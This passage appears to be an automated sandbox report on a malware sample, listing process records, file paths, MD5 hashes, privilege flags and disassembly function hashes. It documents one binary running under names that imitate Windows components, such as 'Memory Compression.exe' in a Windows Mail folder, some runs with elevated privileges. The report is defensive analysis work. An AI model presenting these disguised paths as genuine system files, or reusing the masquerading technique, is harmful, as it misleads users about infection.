                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:49
                                                                                                                                Start time:09:02:11
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff6ef0c0000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:51
                                                                                                                                Start time:09:02:17
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                                                                Imagebase:0xde0000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:52
                                                                                                                                Start time:09:02:18
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                                                                Imagebase:0x780000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:53
                                                                                                                                Start time:09:02:22
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:55
                                                                                                                                Start time:09:02:44
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                                                                                                                                Imagebase:0x420000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:4
                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                  execution_graph 9508 7ff84932d7f1 9510 7ff84932d80f 9508->9510 9509 7ff84932d956 QueryFullProcessImageNameA 9511 7ff84932d9b4 9509->9511 9510->9509 9510->9510

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FF848F30D48 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 210 7ff848f30d48-7ff848f30eb9 call 7ff848f307c8 228 7ff848f30ebb-7ff848f30f05 210->228 229 7ff848f30f2f-7ff848f30f67 210->229 236 7ff848f30f1e 228->236 237 7ff848f30f07-7ff848f30f1d 228->237 235 7ff848f30f6f-7ff848f31050 229->235 238 7ff848f30f1f-7ff848f30f2d 236->238 237->238 238->229
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5Y_H
                                                                                                                                  • API String ID: 0-3237497481
                                                                                                                                  • Opcode ID: 4bdaa6c9fa1e706c1a83b53c99aad7f686c53121fd42e2479deab440eb2230cf
                                                                                                                                  • Instruction ID: 38b6e4f73d8097200e748c16530b99d90060c9e10c7525acdd49f54f6576320e
                                                                                                                                  • Opcode Fuzzy Hash: 4bdaa6c9fa1e706c1a83b53c99aad7f686c53121fd42e2479deab440eb2230cf
                                                                                                                                  • Instruction Fuzzy Hash: 7191C171D1DA899FE789EB2888293AABFE1FB99350F4001BBC049D72D2CF791814C715
                                                                                                                                  Function 00007FF849320120 Relevance: .8, Instructions: 838COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2199832925.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849320000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c3d9b43150e986357a9ac71a010b4b6a0c1e7640da019dbbd593e46464fc4c34
                                                                                                                                  • Instruction ID: c4e10c41607b99d78fea094434d23de3a9afab3e82571fdbf0b266952390d581
                                                                                                                                  • Opcode Fuzzy Hash: c3d9b43150e986357a9ac71a010b4b6a0c1e7640da019dbbd593e46464fc4c34
                                                                                                                                  • Instruction Fuzzy Hash: B752EA30A0C68D8FDBA8EF18C855AB977E1FF56350F1451B9D04EC7292DA34AC4ACB81
                                                                                                                                  Function 00007FF84932B75D Relevance: .7, Instructions: 703COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2199832925.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849320000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0345c5b28ae1c80027b20ceaa5937a1b6464fadc071531a5626978bb4b7ec248
                                                                                                                                  • Instruction ID: bfd07501577d978325c0797d134c11f74ff6f7c8b99f454a7ffe1d6f6061198e
                                                                                                                                  • Opcode Fuzzy Hash: 0345c5b28ae1c80027b20ceaa5937a1b6464fadc071531a5626978bb4b7ec248
                                                                                                                                  • Instruction Fuzzy Hash: AE22D431E1C9995FE768FF6898566BA77E1FF9A390F0401BAD40DC32C2DE286C428751
                                                                                                                                  Function 00007FF849336632 Relevance: .5, Instructions: 460COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2199832925.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849320000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 32b3777ef141a07ed8557c493919f0a02ef99dd46ca616c8c16c015f5c8beecb
                                                                                                                                  • Instruction ID: 776d37e91f49dc90ea1d09f27269dbec29bebe1dd36040286a1bcb9456c48ea6
                                                                                                                                  • Opcode Fuzzy Hash: 32b3777ef141a07ed8557c493919f0a02ef99dd46ca616c8c16c015f5c8beecb
                                                                                                                                  • Instruction Fuzzy Hash: 94E1A33090CA8E8FEBB8EF28C8567E977E1EB55354F14426ED84DC7291CE7898458B81
                                                                                                                                  Function 00007FF848F30E43 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f7849d6a9d2934e6bd7141c780a528402e6fb138a7c79b22ab958bde676e896
                                                                                                                                  • Instruction ID: a4a6ce77c106e579f7a33fbe38a5a9722acf2cbf88084cc266c512dd7499643e
                                                                                                                                  • Opcode Fuzzy Hash: 0f7849d6a9d2934e6bd7141c780a528402e6fb138a7c79b22ab958bde676e896
                                                                                                                                  • Instruction Fuzzy Hash: B2518E71A19A8D9EE788EB2888697BABFE1FB99354F5002BBC009D37D5CF791411C704
                                                                                                                                  Function 00007FF84932D7F1 Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2199832925.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff849320000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FullImageNameProcessQuery
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3578328331-0
                                                                                                                                  • Opcode ID: da756a60c7285ef726f93c96eae180c5d1c329bd197943a7648be9d0810d2cc0
                                                                                                                                  • Instruction ID: 7ed6394977cea522a141e3c8265e22e796785373d6b97be706309e787001a62f
                                                                                                                                  • Opcode Fuzzy Hash: da756a60c7285ef726f93c96eae180c5d1c329bd197943a7648be9d0810d2cc0
                                                                                                                                  • Instruction Fuzzy Hash: 4F81803051CA8D8FDB68EF28C8597F977E1FB59311F04427EE84EC7292CA74A8458B81
                                                                                                                                  Function 00007FF848F308D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7363aaac8e113f47bfea78507d1a4a410b08df6e28abf895207fab16991cc177
                                                                                                                                  • Instruction ID: 82d257a5c1c4569eae7e7460f0798e1cb5eecb88e8a7388e2b249056bb5cbbc6
                                                                                                                                  • Opcode Fuzzy Hash: 7363aaac8e113f47bfea78507d1a4a410b08df6e28abf895207fab16991cc177
                                                                                                                                  • Instruction Fuzzy Hash: 71415922B1E5595EE744B76CB0896FA7790EF853A5F0406BBE44DCB1D3CE1CA8818298
                                                                                                                                  Function 00007FF848F3116D Relevance: .1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f27d55450f3f81044c298dbbec7e7d2251512593f3b08adf1c53940b40ce2cf
                                                                                                                                  • Instruction ID: f7e4d05da6c8f98cf18f97dd76d7532122ce2c74cc1a3b31daf4f90fb1e2b2a0
                                                                                                                                  • Opcode Fuzzy Hash: 4f27d55450f3f81044c298dbbec7e7d2251512593f3b08adf1c53940b40ce2cf
                                                                                                                                  • Instruction Fuzzy Hash: 9C31A23190D6498FDB45FB68C859ABD7BF0FF5A340F0405BBD00AD72A2DB28A841CB50
                                                                                                                                  Function 00007FF848F30998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 52d4b36e947af4e1c8c73b9a361a15147ac33d256935f28e62dda28d8636196e
                                                                                                                                  • Instruction ID: 10f5147a07bcdf765c19e89d3f616637ad5ed982b46d8f10d1270e1c0c836904
                                                                                                                                  • Opcode Fuzzy Hash: 52d4b36e947af4e1c8c73b9a361a15147ac33d256935f28e62dda28d8636196e
                                                                                                                                  • Instruction Fuzzy Hash: 2421A430B1DD591FE748F72C944A67A76C2EB99391F5000BAE40EC33E6DE28EC418255
                                                                                                                                  Function 00007FF848F30C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1fae11f108db634a4592463df07d746f749addfb8d4a659b6c4b82bb927b314d
                                                                                                                                  • Instruction ID: 15468f2cd0fdb5a1edd4b543b51c17f240d2099fe206e57257221c45dfb95cea
                                                                                                                                  • Opcode Fuzzy Hash: 1fae11f108db634a4592463df07d746f749addfb8d4a659b6c4b82bb927b314d
                                                                                                                                  • Instruction Fuzzy Hash: 2D21F636A0E289DEE312B76898111EC7B60EF823A5F1442B3D448CB1C3DB3C654AC799
                                                                                                                                  Function 00007FF848F352C2 Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e0b620a218b93a996d0b89ae2e89409ad938c83062e501ca264a860d9452341c
                                                                                                                                  • Instruction ID: b707af7f789b311011570e91029ffb5a4fcd2a1a6425c5e3cb616205098da35d
                                                                                                                                  • Opcode Fuzzy Hash: e0b620a218b93a996d0b89ae2e89409ad938c83062e501ca264a860d9452341c
                                                                                                                                  • Instruction Fuzzy Hash: E8211930D1C91A4FE7A4B71888557B872A1FF88351F5001BBD84EE32D6DF2869808A49
                                                                                                                                  Function 00007FF848F3538E Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 19c4501acf0f46107967aa1b41a25b7507f4552dab43125d605df597236d98ee
                                                                                                                                  • Instruction ID: 97f345782b9732e65b6d8bad8d96bfb083909a9fef7d883abe152831e7db42df
                                                                                                                                  • Opcode Fuzzy Hash: 19c4501acf0f46107967aa1b41a25b7507f4552dab43125d605df597236d98ee
                                                                                                                                  • Instruction Fuzzy Hash: 63113030E0C91A8FEA94FB28D4556B87392EFD8340F5000B7D84ED32D6EE68B9418649
                                                                                                                                  Function 00007FF848F30C38 Relevance: .1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 512d1fd8b0b56299efd98ba3afdead8690151533a15deb53951868cde2f04873
                                                                                                                                  • Instruction ID: 3fc7ebe0e7f2fbebe4a356f9f285f7b0c436207ccfb80a495ea36b7354f5b35f
                                                                                                                                  • Opcode Fuzzy Hash: 512d1fd8b0b56299efd98ba3afdead8690151533a15deb53951868cde2f04873
                                                                                                                                  • Instruction Fuzzy Hash: 7A117031A0D68D9FE712FB2898511AD7BB0EF82390F1545F7C844DB2D2DA3855498785
                                                                                                                                  Function 00007FF848F30C40 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b8a164320b178126d052c808642c8b5a22e3f5bf64111c02b63bdeca1861cbc6
                                                                                                                                  • Instruction ID: 534ba128f44279cad7684544e4e09eafc09cd788e1dd7922116e7ff133fb029e
                                                                                                                                  • Opcode Fuzzy Hash: b8a164320b178126d052c808642c8b5a22e3f5bf64111c02b63bdeca1861cbc6
                                                                                                                                  • Instruction Fuzzy Hash: 5F11AD31E0D6898FE702FB2898500AD7FB0EF82390F1541F7C844DB2D2DA386949CB85
                                                                                                                                  Function 00007FF848F31AFC Relevance: .0, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b300974cfc5de33c3cdd800f757efb15f3fe07cad982d8252dc5f6e282bed4b3
                                                                                                                                  • Instruction ID: 1f375d69d1ec5550a391f4059fa1340eaba8b44a3ebfa41ca78086f0f7fbd846
                                                                                                                                  • Opcode Fuzzy Hash: b300974cfc5de33c3cdd800f757efb15f3fe07cad982d8252dc5f6e282bed4b3
                                                                                                                                  • Instruction Fuzzy Hash: 57014030A0C9198FDB58EB04C891EA9B3E1EB68340F4042AAD40ED32D1CF34A984CF85
                                                                                                                                  Function 00007FF848F34207 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6004cc1c4274bd45c5831151c298328e8d5418947ccf078b336ded4c135d2758
                                                                                                                                  • Instruction ID: 1fa0a482f6e9d02690a4707460b284f7ca06ddda9a5fba1f537a90974e7f904f
                                                                                                                                  • Opcode Fuzzy Hash: 6004cc1c4274bd45c5831151c298328e8d5418947ccf078b336ded4c135d2758
                                                                                                                                  • Instruction Fuzzy Hash: 2CF03031E1D91A5FF7D4F72884547B922C3EB98380F1445B7D81DC32C5DE386C818685
                                                                                                                                  Function 00007FF848F30C50 Relevance: .0, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5298dbeacee39ca932460fada1076c748ee7a6564d43e29bd9547b97f84577b4
                                                                                                                                  • Instruction ID: 09ff2675881fb3f7f49266283eebacc012bf29ff43d200ffddb56e53212d898f
                                                                                                                                  • Opcode Fuzzy Hash: 5298dbeacee39ca932460fada1076c748ee7a6564d43e29bd9547b97f84577b4
                                                                                                                                  • Instruction Fuzzy Hash: AE017830D0E2899FE712FB6488540ADBFB0AF82394F1841F7D844DB2D2DA386A48C785
                                                                                                                                  Function 00007FF848F3541D Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00824e5838731c44b5c43462efd30fdea2b9becd264f405d9f3597f0843a589c
                                                                                                                                  • Instruction ID: 519987ced853878801cf216373de71483b87059999e21c0888932fa41c149c4f
                                                                                                                                  • Opcode Fuzzy Hash: 00824e5838731c44b5c43462efd30fdea2b9becd264f405d9f3597f0843a589c
                                                                                                                                  • Instruction Fuzzy Hash: C5F0903090C40A4FE694F708D8417F83392EF88391F1001BBD84FE32D6DE28BD458A49
                                                                                                                                  Function 00007FF848F32491 Relevance: .0, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 740caa0291b909b3e51f6c0c6d7921506e7f0311f4e77b85402154febafeaa27
                                                                                                                                  • Instruction ID: 78bf4f095c2bb1a25e39e26900e86bd2f963fe432292b8773c140f1979becc2c
                                                                                                                                  • Opcode Fuzzy Hash: 740caa0291b909b3e51f6c0c6d7921506e7f0311f4e77b85402154febafeaa27
                                                                                                                                  • Instruction Fuzzy Hash: AAE06D31E0E82B9FF6E0B71CC444AB922C6EF98790F1402B3E80DC32C5DE286CC14685
                                                                                                                                  Function 00007FF848F30CCD Relevance: .0, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9abb561333cd27a8e4f336cb3e7a4f2637df40645d9d25e60422b0c1a875d7c2
                                                                                                                                  • Instruction ID: 50fab9d7ac3770950291b56210eeccd9cf08110ac342b3970ce8ad076ed01ac7
                                                                                                                                  • Opcode Fuzzy Hash: 9abb561333cd27a8e4f336cb3e7a4f2637df40645d9d25e60422b0c1a875d7c2
                                                                                                                                  • Instruction Fuzzy Hash: 54F03A31E0C64ADEE744FB2484856BAB6E0EB95391F1445BBD809D22C5DB3865808A44
                                                                                                                                  Function 00007FF848F31E76 Relevance: .0, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 513370d7f9ee93e839e3de96bb426a5bde35a8935ed1e8047ee4a6a0860fbc9c
                                                                                                                                  • Instruction ID: 3ca56dd1ccc6f68e934349d651cc16e97bfc665aba5e31db00edc1945dfe5944
                                                                                                                                  • Opcode Fuzzy Hash: 513370d7f9ee93e839e3de96bb426a5bde35a8935ed1e8047ee4a6a0860fbc9c
                                                                                                                                  • Instruction Fuzzy Hash: BAE04F31E0982E5FE6D4F71C8444AB923D2EB98740F1002B3D81CC32C5DE286C818785
                                                                                                                                  Function 00007FF848F36F01 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fc7094eeb4794d424b703d3708d3935327f2967980bb3fc0de8692a787a54a96
                                                                                                                                  • Instruction ID: ab238548c46bbdf943d4d88b053542f5bbd6be99768c7fc7d59cb4a3bfada43a
                                                                                                                                  • Opcode Fuzzy Hash: fc7094eeb4794d424b703d3708d3935327f2967980bb3fc0de8692a787a54a96
                                                                                                                                  • Instruction Fuzzy Hash: 1AE01A30E0D1168BF755B398D8413A97265EB88380F1450BAED0EA33C2DE28AE458709
                                                                                                                                  Function 00007FF848F3085D Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2190704169.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_Udzp7lL5ns.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 28d46ec8f6734d0c972d30e0222444d7b239de2724329f2d889af5c15fc7c3cb
                                                                                                                                  • Instruction ID: 07751ffe6aed58e696a73cae45b1d8a8e334b65791bbb295d342f060e2e7abbf
                                                                                                                                  • Opcode Fuzzy Hash: 28d46ec8f6734d0c972d30e0222444d7b239de2724329f2d889af5c15fc7c3cb
                                                                                                                                  • Instruction Fuzzy Hash: 2CC08C34614C088FCA08FB2DC88580833A0FB0A300BC200E1E00CC71B1E219DCC2CB41
                                                                                                                                  Function 00007FF848F30B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
